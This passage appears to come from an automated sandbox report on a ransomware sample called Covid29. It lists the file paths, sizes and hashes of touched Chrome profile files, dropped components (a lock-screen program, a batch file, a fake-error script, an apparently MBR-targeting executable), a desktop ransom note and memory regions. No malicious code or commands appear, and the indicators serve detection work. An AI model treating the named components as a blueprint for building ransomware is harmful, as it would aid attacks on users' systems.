                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        60e3276102da66d13f3abb874eee9352

                                                                                        SHA1

                                                                                        9e07a128f1f5dd89501d6b3da1eaa8b9c34eda33

                                                                                        SHA256

                                                                                        26312e67a7b3f14631e6b3ee86f81d1cdd110dfba60dc61c8cb9b9187cc1b58d

                                                                                        SHA512

                                                                                        3e34c41e1f53369a35adca13446645f4226889aacbfb2add56a8cc354a0ed9cdc63fb4eca60772b5a070800905e4087b8627a4729ede6e40c38a95c44b6b3ba6

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        537B

                                                                                        MD5

                                                                                        716b2bdf1111bc08cda2ba05a3b9fe91

                                                                                        SHA1

                                                                                        73622b9a5f4e47af798c0b58f6f3bb2142432788

                                                                                        SHA256

                                                                                        d71296a824b938c29ddc9db4bb6fb44b9aea629a238fc2941ee7cd46fffb646b

                                                                                        SHA512

                                                                                        7cf4807808f6627f7c580797a877fa9a01267094fb9689e21830d0cfd181066024a07372573c346982fdd7fcc254f23bc6087fd123f4234d67527c423a47dbcf

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        537B

                                                                                        MD5

                                                                                        dc5e9ca56e8530f0a45b4af8bc564ef0

                                                                                        SHA1

                                                                                        116064ce71e9c05786b2499fde3451faaee6f627

                                                                                        SHA256

                                                                                        55f24eec47d27129991d49ab02d085c441d9285ee0c31af634cf1112986528d0

                                                                                        SHA512

                                                                                        8ba928f086773d29a56a976c2e18d7b0d58acb96d2fed3f24956e46de0a2b5eeac735a57c92d920934c09ab6904ae285dd3c77963b578d6560f9fcc5e0384be0

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        42734685bacd2505bb04d7bbffbca025

                                                                                        SHA1

                                                                                        034b9ace7a5902c7ee672f9adfec7e2eca3e195a

                                                                                        SHA256

                                                                                        4712edc7effd686b00680890112b972e5a08a0279d14190ba91a54ea893790b3

                                                                                        SHA512

                                                                                        8a211b634c131c91c22fd03ea0153eeca123f25dcbcacd8a9133c9a369568411f90c70bbf8c1ad51c9507965af3e28dc79f362c515d8a4ca49a022d2ad97a21f

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        2b8221d87709dfe5c5852424f81fc322

                                                                                        SHA1

                                                                                        c767a0b438f2299d875191c949f457236e2d7e46

                                                                                        SHA256

                                                                                        ee92b9934f755d85288111c6bc5023ab8cecde941545428317ba5220e9298aad

                                                                                        SHA512

                                                                                        6c0602f2c2721690871a42b3d8a6da57b234f29af087dee3bcc9675af5f5714b0dc4283d2090bb292130cb70eeb6d35e8afccdefd66db99ec8f0513bee9ab768

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        841788006a2d0b70324d3768ced93265

                                                                                        SHA1

                                                                                        2ecc65717934c2619fedd108b66a014fc6e02604

                                                                                        SHA256

                                                                                        f80680d05c0e10b82d29419fccac6fe6dbca646995e916a6ac6f5fdd42e788c2

                                                                                        SHA512

                                                                                        ecbdeffa5423f2a9ae9b07b2427dd0826e0d399c8a685a61aa33aa116e6b824fe682f6c0b628ab679df03a2f4040628dc671dca1d8dc67167b12d56bc2b22060

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        369B

                                                                                        MD5

                                                                                        7c7aa7d5e2bf1d6406260231a396628e

                                                                                        SHA1

                                                                                        0a3285b7c828affcea4bdcf4963907f8a731fa4a

                                                                                        SHA256

                                                                                        351cc148198d638beb39e4ce4557d0914cab1744d4181a5f29f2e487566b48c7

                                                                                        SHA512

                                                                                        28ea06c91a936e50ffdbc9d07aa5865e121a96c12f28e7272b880d1a03047b33f70afd588510f4e623c58b142b3ecde6f7cff5e0a2a9cb92ac5cc4bd4bdd32b6

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        369B

                                                                                        MD5

                                                                                        5371fa9adf8be9230dcd546c5ef5fc98

                                                                                        SHA1

                                                                                        39f49e32c5b117ad6326cf04557d96e49243789a

                                                                                        SHA256

                                                                                        4f50de1f72aee1911fc75434ee0a7ce1baf59de3ae88841c96a2fd98a1b9e097

                                                                                        SHA512

                                                                                        cbcdddb18a0efcdba76453f30107102821fbafe6a8077e88625aa23a29a6cfd413e19c88ac775fe0300bc12dc18f7270767ce43ee49361238670abe6cf16920a

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                        Filesize

                                                                                        6KB

                                                                                        MD5

                                                                                        793f7da6a0385b5ca6df507f1a6f14dd

                                                                                        SHA1

                                                                                        3a28d8ec7972372ae52644b4569c62568dc17f03

                                                                                        SHA256

                                                                                        8778524b7eebd289403c6044be2309e09d2f8bec2cdcf8386527e6ca55df5f7d

                                                                                        SHA512

                                                                                        07bcee0c6d662ad46db1894261494e3030ad3e71bfac2e56d50b6e33874e9260965b89968e1b02e764b9d5bbc41e262baff1c45cd499c9a401ead0cb702faa9f

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                        Filesize

                                                                                        6KB

                                                                                        MD5

                                                                                        c998194e6f624430ce899698692e0107

                                                                                        SHA1

                                                                                        52119ddc48456a9b2aeb82b78b3830bbf1304dd2

                                                                                        SHA256

                                                                                        2b92214d2738e8f70f4e448df9a638a06cb6a2323dfa51f27ac336e46f428b41

                                                                                        SHA512

                                                                                        1d4a19b5c9eca3adfa15e7b1a453d79fd309986bd35d9a2c88ce98e5574528ba084321d115fc9accb8923e88412a367bb5dbde2ae28167448a554882fceac84c

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                        Filesize

                                                                                        6KB

                                                                                        MD5

                                                                                        55ab62fe2ce6d1d8e0f831ddccef71e3

                                                                                        SHA1

                                                                                        690dd5da23b99f5d2f6bf6aaa1dc1fc7736b5f17

                                                                                        SHA256

                                                                                        4436678e8f7aa8fac4a1003eea3e56904984f9405a69e82ddb2068808c90f24d

                                                                                        SHA512

                                                                                        723ac31d307ef3e99b512214f88771ce155a5cab9b1d3aacb0540e9a9ad136e30fee6a8d02daaa5e61b591feed3ac13483f6dcdf322bfcf6f3071e174f34ebb7

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                        Filesize

                                                                                        5KB

                                                                                        MD5

                                                                                        fd0aa7759c867cb90a069f0727bd8068

                                                                                        SHA1

                                                                                        37618768a55353f4db9043daef6f8cb266bb0ad5

                                                                                        SHA256

                                                                                        23167620f97ec5c81704f7f69085c1c1c4f005ca31242c44d8c25853eab0823e

                                                                                        SHA512

                                                                                        645336537367e40c18770f08e4f1b6a582adb21be0dcfb32fa5b1dcd2410153c288821f7f0e0dd36dfd793450ab94575f31beb926a3d077377cc6db49c244f89

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                        Filesize

                                                                                        6KB

                                                                                        MD5

                                                                                        51a242cf0a760c0d9d3d32d2328d2b3d

                                                                                        SHA1

                                                                                        f61e1177d3f6bb4a0773bb9cb04ab3e3c9dc3a37

                                                                                        SHA256

                                                                                        cbc92f8a89e1b98f9fe6d3742f9d06c534ac345ba5a49215842d5f895f03e365

                                                                                        SHA512

                                                                                        acadddb387a6525c51b51dbdfd508fdefa2424894136d7d9a45fed4b4874ad684dc2389ec5b894c3dee760fa577244defb47406c2038185d2860b8a24431ede8

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                        Filesize

                                                                                        6KB

                                                                                        MD5

                                                                                        ab50e2c854bc4fb27f944788da761595

                                                                                        SHA1

                                                                                        8d2e336cdee5abbb8010da46304c07a0e090503f

                                                                                        SHA256

                                                                                        e78adc476acc16fd4ac2accd2e7ff5863451e0f41522a60c1010d2ee75e80824

                                                                                        SHA512

                                                                                        9f4a62847bbbb582e43b640adab24d63d4bacc315a90c6117d5ec694a57d3a551d261ea0fb5d327cdc0083c69454bd70a7d01bec47d7517e96d17761077eb1f3

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                                        Filesize

                                                                                        56B

                                                                                        MD5

                                                                                        ae1bccd6831ebfe5ad03b482ee266e4f

                                                                                        SHA1

                                                                                        01f4179f48f1af383b275d7ee338dd160b6f558a

                                                                                        SHA256

                                                                                        1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

                                                                                        SHA512

                                                                                        baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt.tmp

                                                                                        Filesize

                                                                                        120B

                                                                                        MD5

                                                                                        36aa88b39f316d194f97c87dea61155a

                                                                                        SHA1

                                                                                        da8a26a6634a88dd47d569322fda38bf513b1d89

                                                                                        SHA256

                                                                                        0851a796613c940b77ed991b53635afaedb32f1989c4c3aeb62dd0def589b731

                                                                                        SHA512

                                                                                        24c7ccc1bebf81ed414de3a88821ce59ef88f9f8e7c6b450ec471e14f5f1eb160d4a140b9d20e59f9a898098cce31e64e024627619be3b9fcad663633fe23404

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe590054.TMP

                                                                                        Filesize

                                                                                        120B

                                                                                        MD5

                                                                                        d85fd186101a6601a8054987609b3f6e

                                                                                        SHA1

                                                                                        6b2e2ff3f3231be358cdd15c31004492e9cd18cf

                                                                                        SHA256

                                                                                        84571578ed4fb896570b98834e6b8d2b0867e064f63bdb09d16873093a65e445

                                                                                        SHA512

                                                                                        a852963f009e796e07cf0a0043befa0f1f2547fd96b686b87ddaff976eac4c379031d23e90aa1c5a4e49b972ae7a2657ef1aa712e6ba632cc735b48d2f3bfb82

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                        Filesize

                                                                                        262KB

                                                                                        MD5

                                                                                        69b0749b7ae960b9c0e52cae03f76d28

                                                                                        SHA1

                                                                                        6667534f7ab5e1d760f30f3e724b150968a7f097

                                                                                        SHA256

                                                                                        e85213d9e7d6d95421f5f3edbefae0fdfe82d1ac311f36fa070e878a3d40907e

                                                                                        SHA512

                                                                                        64625101cdd286713ae6b1c583102dc9dfacd41b5f588866a0991b5496393cd8f0e70409b8c1bd20b464b5959e530959c1f42be5b87bee2b76bd20680f85c994

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                        Filesize

                                                                                        98KB

                                                                                        MD5

                                                                                        fe75fdb7a720d9af55e6463148576592

                                                                                        SHA1

                                                                                        a0e19af6b1692705242b013539e97e572682d5ca

                                                                                        SHA256

                                                                                        bfdca586d474120bd778cacf6cb34bf3fa9321bfb6239e167aad0e9f001f3655

                                                                                        SHA512

                                                                                        48ad2150881856333bb76882ffcaca31cbfb71269adf81f04bb625456bf6f6832187006c546c78c99831f219b36cc0cb8e5f85869b6a1525693d6891a3c3abf6

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                        Filesize

                                                                                        106KB

                                                                                        MD5

                                                                                        c96b8bd58bc7adc556cbe7d04cbe928b

                                                                                        SHA1

                                                                                        02828c74b4b3641c16d1e78ecb9c45130f4d206a

                                                                                        SHA256

                                                                                        630ee0e2c71ee0f7bf189584cca4a129a2a6e84f9deffa558373e5959036ec9c

                                                                                        SHA512

                                                                                        338982dd0695ef102e7b76d4d6643a45575aa1f45ec3f6bdfbf05dd81fb27b84154fe363d05b526d2b3480814919314a84651124fe8ecdf119b812118b4c0268

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59e1cb.TMP

                                                                                        Filesize

                                                                                        97KB

                                                                                        MD5

                                                                                        ff94d52eb908e77ed4c6792d99745a12

                                                                                        SHA1

                                                                                        b5743f29560842c708c7ae4663c1ffd27a078540

                                                                                        SHA256

                                                                                        94bd03d9042f45302ce2cb6abdd15f31bb1d4a987b73f50067e0f91c3ead6c24

                                                                                        SHA512

                                                                                        864398e0fe3208f6f5bed46ba0a5059be8692bd7628ac50ab180a0b617ceea5d0c73ad8c7aab85813b83e37da2ccec42a6ec5724194e00ce1a1543fde57ff7f1

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                                                                        Filesize

                                                                                        2B

                                                                                        MD5

                                                                                        99914b932bd37a50b983c5e7c90ae93b

                                                                                        SHA1

                                                                                        bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                        SHA256

                                                                                        44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                        SHA512

                                                                                        27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                      • C:\Users\Admin\AppData\Local\Temp\5996.tmp\Cov29Cry.exe.death

                                                                                        Filesize

                                                                                        103KB

                                                                                        MD5

                                                                                        8bcd083e16af6c15e14520d5a0bd7e6a

                                                                                        SHA1

                                                                                        c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                                                        SHA256

                                                                                        b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                                                        SHA512

                                                                                        35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\5996.tmp\Cov29LockScreen.exe

                                                                                        Filesize

                                                                                        48KB

                                                                                        MD5

                                                                                        f724c6da46dc54e6737db821f9b62d77

                                                                                        SHA1

                                                                                        e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                                                        SHA256

                                                                                        6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                                                        SHA512

                                                                                        6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                                                      • C:\Users\Admin\AppData\Local\Temp\5996.tmp\TrojanRansomCovid29.bat

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        57f0432c8e31d4ff4da7962db27ef4e8

                                                                                        SHA1

                                                                                        d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                                                        SHA256

                                                                                        b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                                                        SHA512

                                                                                        bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                                                      • C:\Users\Admin\AppData\Local\Temp\5996.tmp\fakeerror.vbs

                                                                                        Filesize

                                                                                        144B

                                                                                        MD5

                                                                                        c0437fe3a53e181c5e904f2d13431718

                                                                                        SHA1

                                                                                        44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                                                        SHA256

                                                                                        f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                                                        SHA512

                                                                                        a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                                                      • C:\Users\Admin\AppData\Local\Temp\5996.tmp\mbr.exe.danger

                                                                                        Filesize

                                                                                        1.3MB

                                                                                        MD5

                                                                                        35af6068d91ba1cc6ce21b461f242f94

                                                                                        SHA1

                                                                                        cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                                                        SHA256

                                                                                        9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                                                        SHA512

                                                                                        136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                                                      • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                                                        Filesize

                                                                                        861B

                                                                                        MD5

                                                                                        c53dee51c26d1d759667c25918d3ed10

                                                                                        SHA1

                                                                                        da194c2de15b232811ba9d43a46194d9729507f0

                                                                                        SHA256

                                                                                        dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                                                        SHA512

                                                                                        da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                                                      • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                                                        Filesize

                                                                                        1.7MB

                                                                                        MD5

                                                                                        272d3e458250acd2ea839eb24b427ce5

                                                                                        SHA1

                                                                                        fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                                                        SHA256

                                                                                        bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                                                        SHA512

                                                                                        d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                                                      • memory/60-711-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                        Filesize

                                                                                        864KB

                                                                                      • memory/1508-728-0x00007FFD74E80000-0x00007FFD75941000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/1508-798-0x00007FFD74E80000-0x00007FFD75941000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/2176-712-0x0000000000640000-0x0000000000660000-memory.dmp

                                                                                        Filesize

                                                                                        128KB

                                                                                      • memory/2176-727-0x00007FFD74E80000-0x00007FFD75941000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/2176-713-0x00007FFD74E80000-0x00007FFD75941000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/4376-726-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                        Filesize

                                                                                        1.8MB

                                                                                      • memory/4376-781-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                        Filesize

                                                                                        1.8MB

                                                                                      • memory/4376-679-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                        Filesize

                                                                                        1.8MB